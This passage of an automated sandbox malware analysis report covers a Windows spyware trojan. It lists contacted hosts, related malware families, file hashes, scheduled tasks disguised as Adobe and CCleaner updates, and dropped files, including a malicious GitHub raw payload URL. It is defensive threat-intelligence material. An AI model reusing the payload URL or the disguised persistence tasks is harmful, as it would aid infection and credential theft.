https://api.ip.sb/geoipAppData	Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.199.111.133	raw.githubusercontent.com	Netherlands		54113	FASTLYUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581194
Start date and time:	2024-12-27 08:18:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	77
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	8lOT1rXZp5.exe renamed because original name is a hash value
Original Sample Name:	34807a743f2d680eef051852eaef0b16.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@139/54@23/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 97 Number of non-executed functions: 295
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:19:36	API Interceptor	1x Sleep call for process: Uno.exe.com modified
02:19:36	API Interceptor	10x Sleep call for process: Inebriato.exe.com modified
02:20:07	API Interceptor	19646x Sleep call for process: RegAsm.exe modified
02:20:30	API Interceptor	46x Sleep call for process: powershell.exe modified
02:20:44	API Interceptor	4x Sleep call for process: WMIC.exe modified
02:20:47	API Interceptor	2x Sleep call for process: wscript.exe modified
07:20:43	Task Scheduler	Run new task: Adobe Acrobat Update Task53 path: C:\Users\user\AppData\Roaming\UeNuQ\578.vbs s>fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat"
07:20:43	Task Scheduler	Run new task: CCleaner Update79 path: C:\Users\user\AppData\Roaming\UeNuQ\939.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.199.111.133	cr_asm2.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_crypter.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_hiddenz.ps1	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	BeginSync lnk.lnk	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse	185.199.108.133
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.199.110.133
	Navan - Itinerary.pdf.scr.exe	Get hash	malicious	LummaC	Browse	185.199.110.133
	BigProject.exe	Get hash	malicious	LummaC	Browse	185.199.110.133
	Set-up!.exe	Get hash	malicious	LummaC	Browse	185.199.108.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.108.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.111.133
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.199.108.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.eml	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://contractnerds.com/	Get hash	malicious	Unknown	Browse	151.101.193.21
	ReJIL-_Document_No._2500015903.msg	Get hash	malicious	Unknown	Browse	151.101.193.91
	http://booking.extranetguests.com/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	151.101.194.137
	Google Authenticator You're trying to sign in from a new location.msg	Get hash	malicious	Unknown	Browse	151.101.192.217
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	23.185.30.197
	https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.com	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://fsharetv.co/	Get hash	malicious	Unknown	Browse	151.101.65.229
	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse	185.199.108.133
	https://yungbucksbbq.com/portbiz/	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	6wFwugeLNG.exe	Get hash	malicious	LummaC	Browse	185.199.111.133
	9mauyKC3JW.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	uUtgy7BbF1.exe	Get hash	malicious	LummaC	Browse	185.199.111.133
	x4PaiRVIyM.exe	Get hash	malicious	LummaC	Browse	185.199.111.133
	3vLKNycnrz.exe	Get hash	malicious	LummaC	Browse	185.199.111.133
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	185.199.111.133
	NewI Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	185.199.111.133
	setup.exe	Get hash	malicious	LummaC	Browse	185.199.111.133
	exlauncher-unpadded.exe	Get hash	malicious	LummaC	Browse	185.199.111.133
	atw3.dll	Get hash	malicious	Gozi, Ursnif	Browse	185.199.111.133

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	99awhy8l.exe	Get hash	malicious	LummaC	Browse
	eRApzqPkL1.exe	Get hash	malicious	RHADAMANTHYS	Browse
	eRApzqPkL1.exe	Get hash	malicious	RHADAMANTHYS	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	vqMMwqCFZQ.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	Remcos	Browse
	pennicle.txt.ps1	Get hash	malicious	LummaC Stealer	Browse
	SolPen.exe	Get hash	malicious	LummaC Stealer	Browse
C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	c2.hta	Get hash	malicious	XWorm	Browse
	c2.hta	Get hash	malicious	XWorm	Browse
	OR8Ti8rf8h.exe	Get hash	malicious	AveMaria, DcRat, StormKitty, VenomRAT	Browse
	RFQ-004282A.Teknolojileri A.S.exe	Get hash	malicious	AgentTesla	Browse
	c2.hta	Get hash	malicious	XWorm	Browse
	c2.hta	Get hash	malicious	XWorm	Browse
	PQwHxAiBGt.exe	Get hash	malicious	RHADAMANTHYS	Browse
	P0J8k3LhVV.exe	Get hash	malicious	Nanocore	Browse
	NIENrB5r6b.exe	Get hash	malicious	XWorm	Browse
	DM6vAAgoCw.exe	Get hash	malicious	Orcus, Xmrig	Browse

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.bat

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	17946
Entropy (8bit):	5.068311467768946
Encrypted:	false
SSDEEP:	192:BdSzVh0cBCm8wi2cA8UlUwrH1c8HsW3JRzD841f8tuqKVYB3rP7TXfIpFpt/kK+Z:BdSzEUCm8wi2l8UpL1FzQ41GrJ7IvGr
MD5:	099268C6CCB11DB81E4A455AB3E20002
SHA1:	17303211AD7B31AD3821FE311559713D5C638A7B
SHA-256:	9B295000F29AD57EF010FF7C845B1A62715D706042B47F25714BEA45F3807FF2
SHA-512:	20F46066620F86DA33D5424B4D67D6BE45CBE45531AF97A9C3D0D274109576418427D3305D3C293DE79DEAE2D27AB6EA2D2C5CD68CBE2833564E1E6CF6017BE5
Malicious:	true
Preview:	: Begin of batch script..@echo off..setLocal EnableExtensions..setlocal EnableDelayedExpansion..:: _ _..:: _ \| \| _ \| \| _..:: ____ _ _\| \|_ ___ _ _ ____ _ \| \| ____\| \|_ ____ \| \| _ ____\| \|_..:: / _ \| \| \| \| _)/ _ \\| \| \| \| _ \ / \|\| \|/ _ \| _)/ _ ) \| \|\| \ / _ \| _)..:: ( ( \| \| \|_\| \| \|_\| \|_\| \| \|_\| \| \| \| ( (_\| ( ( \| \| \|_( (/ / _\| \|_) ( ( \| \| \|__..:: \_\|\|_\|\____\|\___\___/ \____\| \|\|_/ \____\|\_\|\|_\|\___\____(_\|____/ \_\|\|_\|\___)..:: \|_\|..::..:: Automatic RDP Wrapper installer and updater v.1.2 asmtron (2024-29-03)..:: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~..:: Options:..:: -log = redirect display output to the file autoupdate.log..:: -taskadd = add autorun of autoupdate.bat on startup in schedule task..:: -taskremove = remove autorun of autoupdate.bat on startup in schedule task..::..:: Info:..::

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379457704019818
Encrypted:	false
SSDEEP:	48:FWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MvUyus:FLHxvIIwLgZ2KRHWLOug8s
MD5:	DDD86E57C2B793C068C5FE78F119F485
SHA1:	342F7D6AA0A466C5B3EE7BFDE03536A2E4B5A932
SHA-256:	86CDA7EDDE646426291B5253B47DCCA13508C17649A9EA36CF5D5BA531AA94C7
SHA-512:	89F314BF3CB5A266E046F376B9C7F4F72AAE0B883CEA019917A31C4AD83A243F8249C60C8406040E84972A2DFA7C8D71A5A962D084BB99544BF8DC9F38A79BA1
Malicious:	false
Preview:	@...e...............................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bcb01k2.pw2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1x31hsdd.b5t.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jf3ybkt.buf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4iu4lnqe.npy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apvlpguy.exv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_feyzinzl.xj2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huoofykt.n4l.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzbspvtp.mzc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtcx5apn.sgc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krloq1ir.npr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o00fr0xw.lvt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rni3orb2.myt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uisoq0yj.ngz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whdhmq0f.w4s.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvuax0go.v5m.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvh0cxap.fbc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\autC3EF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	1332
Entropy (8bit):	7.434254734798644
Encrypted:	false
SSDEEP:	24:n0wfqc0uk8YWtXwsEpuB8Cu9YPp3XAjafZ4e2zol5BdFyvLZ3XngeI+Uc5oz:0WidWtXw/pnC8YPdXAjaf2EnSLZA7+UJ
MD5:	F9A790C0B11119359C3876592D16987D
SHA1:	74A525B9A4E56B50A87D205137ACCC7CE67C5EC3
SHA-256:	931F4232FA881AF9927E361F997BAC1311E6F1D398667D9AE33324749D9A6A5A
SHA-512:	987258C0D6FE0AE626387CF62AD273D95BF8D51FCB54E8F4C61FAC89B931A3E0012E5446C2D0F57839B7DF0F3F67D0EE7D39B95008F388061AD206D0962106CA
Malicious:	false
Preview:	EA06.....]m.;...n.T.6.%..S.\.6.<.AB..6....r.Ym..L6. ..(..h..,.[m6..R.x...qC..wI.2.T.QjU9..A"..vK-..h..v.m..p..wK...x......i5.M.........."b......4.s%.....1..{....?.k}.Ai.8d.Kx.6@.p......`.3&.Sm6I@....M..(..2...bW1..V.$..,....@.\.......Dp...l.n.H.L..6.aU;..AC.Yl7K-P..Zm.YE..d..$.`...a.Z...H..o.Z..:\|.u ..n.......b.YlwID..c.Zn.@..\....7;....9...T......+.....S2....@#@.}K$.K.......f]W.Zn.Y..j.+....s..t`.h.........l.\.....,.\.g....@ K=...8J@I.p.=.mtKM.Qa..$........-..... ".h.....nW..... .(.~.....AU.[.. . ........J-2.H.!a.....H.V....x.t../.p...x....S=.........i..+w[...n..l...n.a........,..bU...H..X. .y.J@.3,.U.9.....[m..t...2...\..r....y.J.g...K...l........"...@.....V.u..v.+.Wd@........R{ .[.6.E..r..@0y .O'..m.Av..`.$.E"...)...n.../...U.Q.....E?.H...,.7............e....Z..K.._/....[m.....lw+}..f.K.v.l..i.c..9\|.a0.K..)}..t...........O*.+M.......2....m.....s.....K-.......... ye.].6..B.1..%....,..wK}.t.]nV......Y.6..y/...@">Yx.O...XnW@+X.h.L....c0....I..u0.N....T.

C:\Users\user\AppData\Local\Temp\autC400.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	1308
Entropy (8bit):	7.455822971727304
